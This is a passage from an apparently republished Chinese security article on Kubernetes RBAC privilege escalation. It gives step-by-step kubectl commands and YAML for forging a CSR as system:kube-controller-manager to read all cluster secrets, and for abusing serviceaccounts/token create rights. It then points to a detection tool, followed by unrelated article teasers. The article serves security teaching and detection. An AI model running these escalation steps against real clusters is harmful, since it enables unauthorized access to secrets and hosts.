kubernetes.io/kube-apiserver-clientexpirationSeconds: 864000usages:- client auth
EOF

图片

 

创建失败,查看资料存在一个准入控制器CertificateSubjectRestriction[8]发现如果是kubernetes.io/kube-apiserver-client请求组为system:masters会被拒绝。对于不能一步到位表示遗憾,还可以查看有没有其他组存在默认绑定ClusterRole的,比如system:nodes可以直接和kubelet通信对所有的secret和pod进行写访问等。也可查看集群中已经定义好的ClusterRole有没有其他存在默认绑定的,看看那些权限高一点可以拿来用的,然后创建与之匹配的证书,默认的比如有system:kube-controller-manager可以查看secrets,也可以利用system:kube-proxy 访问每个node有一个pod,并可以逃逸的情况直接获得集群所有宿主机权限等等。下图为system:kube-controller-manager权限可以对secrets操作。

图片

 

继续之前的步骤只添加角色为改为-subj "/CN=system:kube-controller-manager",创建CSR并发送。

图片

 

创建成功,可以查看CSR并批准。

# 获取CSR列表
kubectl get csr
# 批准CSR
kubectl certificate approve csr-test

图片

 

然后查看证书,从CSR导出颁发的证书。

# 查看CSR
kubectl get csr csr-test -oyaml
# 证书的内容使用 base64 编码,存放在字段status.certificate
# 导出颁发的证书
kubectl get csr csr-test -o jsonpath='{.status.certificate}'| base64 -d > csr-test.crt

图片

 

由于我们用户设置的是system:kube-controller-manager,会默认绑定到ClusterRole,这时就不需要再对新创建的csr-test进行创建角色和角色绑定的操作了,从而避免了对当前用户权限需要有对RBAC的操作,如果没有相关可以利用的verb进一步提权到头来还是白费,所以这边直接使用集群默认并绑定好的。

将该用户添加到kubeconfig文件中。

# 添加新的凭据
kubectl config set-credentials csr-test --client-key=csr-test.key --client-certificate=csr-test.crt --embed-certs=true# 添加上下文
kubectl config set-context csr-test --cluster=kubernetes --user=csr-test

图片

 

把上下文切换到csr-test测试下。

kubectl config use-context csr-test

图片

 

提权成功整个集群的secrets都可以查看,进一步提权到集群管理员可以获取clusterrole-aggregation-controller的sa的token,也可以一开始的用户设置为system:kube-proxy直接获取整个集群宿主机权限等多种组合利用方式。

下表为一些常见的默认ClusterRole存在默认ClusterRoleBinding:

 

 

令牌请求

当权限具有对serviceaccounts/token的 create 权限的用户可以创建 TokenRequest 对目标sa请求创建一个token。当前用户具有如下权限对sa的获取、例举以及对sa创建token。

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: token-create
rules:
- apiGroups: [""]resources: ["serviceaccounts"]verbs: ["get", "list"]
- apiGroups: [""]resources: ["serviceaccounts/token"]verbs: ["create"]

目前该用户可以列举sa,但是不能查看secrets。

图片

 

请求创建token-create的token,可以通过kubectl也可以通过REST API。

图片

 

拿到token尝试利用,利用使用curl或者kubectl。

kubectl config set-credentials token-create --token=<token>
kubectl config set-context token-create --cluster=kubernetes --user=token-create
kubectl config use-context token-create

通过命令修改kubeconfig添加用户并设置上下文,切换到创建的用户成功列举secrets

图片

 

RBAC检测工具

对于本文中提到的内容,由于目前Github中并没有看到对于RBAC配置利用进行检测的工具,虽对此编写了一款小工具方便有需要的可以检测,具体工具参考rbacr[9],使用中有问题欢迎提交Issues或者pr。

图片

 

对于上文提到的手法,默安科技的云原生保护平台(CNAPP)-尚付已支持检测。

参考资料

  • • Authenticating[10]

  • • Using RBAC Authorization[11]

  • • Kubernetes RBAC 101[12]

  • • Admission Controllers Reference[13]

  • • Kubernetes API[14]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/606926.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【JAVA】final、finally、finalize 有什么区别?

&#x1f34e;个人博客&#xff1a;个人主页 &#x1f3c6;个人专栏&#xff1a; JAVA ⛳️ 功不唐捐&#xff0c;玉汝于成 目录 前言 正文 final&#xff1a; finally&#xff1a; finalize&#xff1a; 结语 我的其他博客 前言 在Java中&#xff0c;final、f…

使用flet创建todo应用

使用 Flet 在 Python 中创建待办事项应用 Create To-Do app in Python with Flet 翻译官网教程https://flet.dev/docs/tutorials/python-todo&#xff0c;对一些地方进行了注释和修改。 安装flet Python版本需要3.8及以上&#xff0c;使用pip安装&#xff1a; pip install…

test fuzz-01-模糊测试(Fuzz Testing)入门 Atheris、Jazzer、jqf、kelinci、FLA、libfuzzer 对比

拓展阅读 开源 Auto generate mock data for java test.(便于 Java 测试自动生成对象信息) 开源 Junit performance rely on junit5 and jdk8.(java 性能测试框架。性能测试。压测。测试报告生成。) test fuzz-01-模糊测试&#xff08;Fuzz Testing&#xff09; test fuzz-…

代码随想录算法训练营day6|242.有效的字母异位词、349.两个数组的交集、202.快乐数

哈希表理论基础 建议&#xff1a;大家要了解哈希表的内部实现原理&#xff0c;哈希函数&#xff0c;哈希碰撞&#xff0c;以及常见哈希表的区别&#xff0c;数组&#xff0c;set 和map。 什么时候想到用哈希法&#xff0c;当我们遇到了要快速判断一个元素是否出现集合里的时…

Unity Urp 渲染管线 创建透明材质球

按照以上方式设置后就可以得到一个透明的材质球 Tips&#xff1a;Blending mode &#xff1a; alpha 和 Blending mode &#xff1a; additive都是完全透明效果具体差异暂时不知道

模型创建与nn.Module

一、网络模型创建步骤 二、nn.Module 下面描述了在 PyTorch 中常见的一些属性和功能&#xff0c;用于存储和管理神经网络模型的参数、模块、缓冲属性和钩子函数。 parameters&#xff1a;用于存储和管理 nn.Parameter 类的属性。nn.Parameter 是一种特殊的张量&#xff0c;它被…

在做题中学习(44):无重复字符的最长字串

3. 无重复字符的最长子串 - 力扣&#xff08;LeetCode&#xff09; 解法&#xff1a;同向双指针————“滑动窗口” 思路&#xff1a;如下图&#xff0c;当right进窗口后&#xff0c;就出现了a重复&#xff0c;所以在left出窗口时时&#xff0c;需要跳到第一个a 后面的位置&…

【QML COOK】- 004-添加动画

1. 编辑main.qml import QtQuickWindow {width: 800height: 800visible: truetitle: qsTr("Hello World")Image {id: backgroudanchors.fill: parentsource: "qrc:/Resources/Images/arrow.png"Behavior on rotation {NumberAnimation {duration: 1000}}}…

Master01节点免密钥登录其他节点

1、执行命令 ssh-keygen -t rsa&#xff0c;一直敲回车 2、for i in k8s-master01 k8s-node01 k8s-node02;do ssh-copy-id -i .ssh/id_rsa.pub $i;done 输入yes和对应节点密码

【CSS】首个字符占用多行,并自定义样式

效果 代码 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" content"widthdevice-width, initial-scale1.0" /><title>首字母大写</title><style&…

【QT】计算器-模拟实现

目录 准本工作 槽函数实现 数字按键槽函数 退格槽函数 运算符 按键 槽函数 等号槽函数 初始化及计算器页面布局 整体代码 widget.h widget.cpp 准本工作 工程创建&#xff1a; 计算器模拟实现需求分析&#xff1a; 样式预览&#xff1a; &#x1f3a0;主要功能&…

uni-app如何生成骨架屏

骨架屏是页面的一个空白版本&#xff0c;通常会在页面完全渲染之前&#xff0c;通过一些灰色的区块大致勾勒出轮廓&#xff0c;待数据加载完成后&#xff0c;再替换成真实的内容。 参考效果 骨架屏作用是缓解用户等待时的焦虑情绪&#xff0c;属于用户体验优化方案。 生成骨…

视频剪辑方法:智能转码从视频到图片序列,高效转换攻略

在视频编辑和后期处理中&#xff0c;经常要将视频转换为图片序列&#xff0c;以便进行单独编辑或应用。下面一起来看云炫AI智剪如何批量智能转码的方法&#xff0c;高效地将视频转换为图片序列。 视频转为序列图片缩略图效果 视频转为序列图片的效果图&#xff0c;画面清晰&a…

基于WIFI指纹的室内定位算法matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 4.1WIFI指纹定位原理 4.2 指纹数据库建立 4.3定位 5.算法完整程序工程 1.算法运行效果图预览 2.算法运行软件版本 matlab2022a 3.部分核心程序 .....................................…

【SpringCloud Alibaba笔记】(4)Seata处理分布式事务

Seata 分布式事务问题 单机单库没这个问题&#xff0c;分布式之前从1: 1 -> 1:N ->N:N 分布式之后 单体应用被拆分成微服务应用&#xff0c;原来的三个模块被拆分成三个独立的应用分别使用三个独立的数据源&#xff0c;业务操作需要调用三个服务来完成。 此时每个服务…

网络调试 UDP1,开发板用动态地址-入门6

https://www.bilibili.com/video/BV1zx411d7eC?p11&vd_source109fb20ee1f39e5212cd7a443a0286c5 1, 开发板连接路由器 1.1&#xff0c;烧录无OS UDP例程 1.2&#xff0c;Mini USB连接电脑 1.3&#xff0c;开发板LAN接口连接路由器 2. Ping开发板与电脑之间通信* 2.1 根据…

浅谈归并排序:合并 K 个升序链表的归并解法

在面试中遇到了这道题&#xff1a;如何实现多个升序链表的合并。这是 LeetCode 上的一道原题&#xff0c;题目具体如下&#xff1a; 用归并实现合并 K 个升序链表 LeetCode 23. 合并K个升序链表 给你一个链表数组&#xff0c;每个链表都已经按升序排列。 请你将所有链表合并到…

【学习总结】地面路谱分析

本文仅用于记录自己的学习总结&#xff0c;包括个人理解。不保证内容严格正确。 0. 参考资料 [1] 国标GB/T 703-2005/ISO 8608:1995。[2] Bilibili 路面不平度统计特性[3] 网络参考文档. 网盘&#xff1a;https://pan.baidu.com/s/1ameuQwdOquCrk2V1PIS-Xw?pwdut9m 1. 路面…

Vue框架底层

一、前端框架的由来 1、服务端渲染 sequenceDiagram 浏览器->>服务器: https://www.bilibili.com/ Note right of 服务器: 组装页面(服务端渲染) 服务器->>-浏览器: 完整页面2、前后端分离 sequenceDiagram 浏览器->>服务器: https://www.bilibili.com/ 服务…

Tensorflow2.0笔记 - 基本数据类型,数据类型转换

【TensorFlow2.0】(1) tensor数据类型&#xff0c;类型转换_tensorflow tensor转int-CSDN博客文章浏览阅读1.5w次&#xff0c;点赞8次&#xff0c;收藏28次。各位同学好&#xff0c;今天和大家分享一下TensorFlow2.0中的tensor数据类型&#xff0c;以及各种类型之间的相互转换方…